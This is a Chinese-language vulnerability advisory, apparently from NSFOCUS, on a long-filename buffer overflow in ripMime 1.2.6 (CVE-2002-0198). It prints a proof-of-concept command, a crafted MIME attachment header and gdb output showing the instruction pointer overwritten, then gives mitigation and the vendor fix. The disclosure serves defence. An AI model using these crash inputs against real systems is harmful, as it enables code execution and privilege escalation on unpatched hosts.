首页 -> 安全研究
安全研究
安全漏洞
RipMime Mime头长文件名缓冲区溢出漏洞
发布日期:2002-01-23
更新日期:2002-01-23
受影响系统:
PLDaniels/PLD ripMime 1.2.6不受影响系统:
PLDaniels/PLD ripMime 1.2.5
PLDaniels/PLD ripMime 1.2.4
PLDaniels/PLD ripMime 1.2.3
PLDaniels/PLD ripMime 1.2.2
PLDaniels/PLD ripMime 1.2.1
PLDaniels/PLD ripMime 1.2.0
PLDaniels/PLD ripMime 1.2.7描述:
BUGTRAQ ID: 3941
CVE(CAN) ID: CVE-2002-0198
ripMime随Inflex(一种Email附件病毒过滤工具)发放,也随Inflex的商业版本XaMime
发放,可运行于绝大多数Unix/Linux系统上。
ripMime在处理文件名的时候存在一个本地缓冲区溢出漏洞。在适当的命令选项用超长的文件名(大于2079个字符)作参数可以覆盖EIP寄存器。攻击者可以利用这个问题执行自己的代码,从而可能提升权限。
<*来源:KF (dotslash@snosoft.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0293.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
./ripmime -i mail -d `perl -e 'print "A" x 255'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA_
用BASE64解码。Segmentation fault
我们在标准邮件文件里使用特殊BASE64文件名的错误头信息
Content-Type: application/octet-stream;
name="blah"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=AAAAAAAAAAAAAAAAAAA....<2000 total chars>
让我们用gdb查看更多信息
(gdb) r -i mail -d `perl -e 'print "A" x 79'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'print "A" x 79'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA_
for BASE64 decoding.
Program received signal SIGILL, Illegal instruction.
0x4141415c in ?? ()
再多一个A,我们就完全覆盖eip。正好是2079个字符。
r0 0x4141415f 1094795615
r19 0x41414141 1094795585
r20 0x41414141 1094795585
r21 0x41414141 1094795585
r22 0x41414141 1094795585
r23 0x41414141 1094795585
r24 0x41414141 1094795585
r25 0x41414141 1094795585
r26 0x41414141 1094795585
r27 0x41414141 1094795585
r28 0x41414141 1094795585
r29 0x41414141 1094795585
r30 0x41414141 1094795585
r31 0x41414141 1094795585
pc 0x4141415c 1094795612
lr 0x4141415f 1094795615
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时停止使用RipMime。
厂商补丁:
PLDaniels/PLD
-------------
目前厂商已经发布了1.2.7版本以修复这个安全问题,请到厂商的主页下载:
http://pldaniels[dot]org/ripmime/ripmime-1.2.7.tar.gz
浏览次数:3007
严重程度:0(网友投票)
绿盟科技给您安全的保障